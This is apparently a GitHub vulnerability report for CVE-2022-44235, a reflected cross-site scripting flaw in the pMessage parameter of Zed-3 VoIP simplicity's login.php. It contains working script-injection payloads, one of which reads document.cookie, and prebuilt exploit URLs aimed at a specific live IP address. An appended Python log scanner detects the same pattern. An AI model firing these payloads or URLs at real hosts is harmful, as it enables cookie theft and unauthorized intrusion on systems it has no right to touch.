CVE-2022-44235: VoIP simplicity of Zed-3 is vulnerable to Cross Site Scripting (XSS) · Issue #1 · liong007/Zed-3
Beijing Zed-3 Technologies Co.,Ltd VoIP simplicity ASG 8.5.0.17807 (20181130-16:12) is vulnerable to Cross Site Scripting (XSS).
**Exploit Title:** VoIP simplicity of Zed-3 is vulnerable to Cross Site Scripting (XSS)
Company to which the vulnerability belongs: Beijing Zed-3 Technologies Co.,Ltd
**Date:** 10/20/2022
**Exploit Author:** Yuan Lirong
Vendor Homepage: www.zed-3.com
ASG Version: 8.5.0.17807 (20181130-16:12)
Attack vector(s):
Beijing Zed-3 Technologies Co.,Ltd. is a high-tech enterprise founded by high-tech talents.
There is an XSS vulnerability in VoIP simplicity, developed by Beijing Zed-3 Technologies Co.,Ltd. An attacker can use this vulnerability to insert XSS execution code into the page "/login.php?pMessage=" through the `pMessage` parameter, perform pop-up operations, and obtain sensitive information such as user cookies.
POC:
```
</script><script>[window["location"]="javascript:alert(/xss/)"]</script>
```
and
```
</script><script>[window["location"]="javascript:alert(document.cookie)"]</script>
```
Vulnerability test cases:
Access requires an IP address in China.
1)https://223.86.24.188:8002
https://223.86.24.188:8002/login.php
ASG Version: 8.5.0.17807 (20181130-16:12)
XSS vulnerability testing can be performed without logging in to the system:
https://223.86.24.188:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(/xss/)%22]%3C/script%3E
https://223.86.24.188:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E
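A defender-side check for this pattern, as an added example that is not part of the original report: it scans web access logs for `/login.php` requests whose `pMessage` value decodes, even when double-encoded, to markup or a `javascript:` URL. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format); client addresses are
# documentation-range placeholders, not taken from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Oct/2022:10:01:02 +0800] "GET /login.php?pMessage=Session%20expired HTTP/1.1" 200 5120
192.0.2.11 - - [20/Oct/2022:10:01:09 +0800] "GET /login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E HTTP/1.1" 200 5240
192.0.2.12 - - [20/Oct/2022:10:02:30 +0800] "GET /login.php?pMessage=%253C%252Fscript%253E%253Cscript%253Ealert(%252Fxss%252F) HTTP/1.1" 200 5190
192.0.2.13 - - [20/Oct/2022:10:03:00 +0800] "GET /index.php?q=%3Cscript%3E HTTP/1.1" 404 310
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Markup or a javascript: URL in a value that should be plain message text.
SUSPICIOUS_RE = re.compile(r'<\s*/?\s*[a-z!]|javascript\s*:', re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_pmessage_xss(log_text):
    """Return (client, decoded pMessage) for suspicious /login.php requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != "/login.php":
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("pMessage", []):
            value = fully_decode(raw)
            if SUSPICIOUS_RE.search(value):
                hits.append((client, value))
    return hits

if __name__ == "__main__":
    for client, value in find_pmessage_xss(SAMPLE_LOG):
        print(f"{client}\t{value}")
```

The same pattern can back a WAF or reverse-proxy rule in front of affected ASG versions until the reflected value is output-encoded by the application.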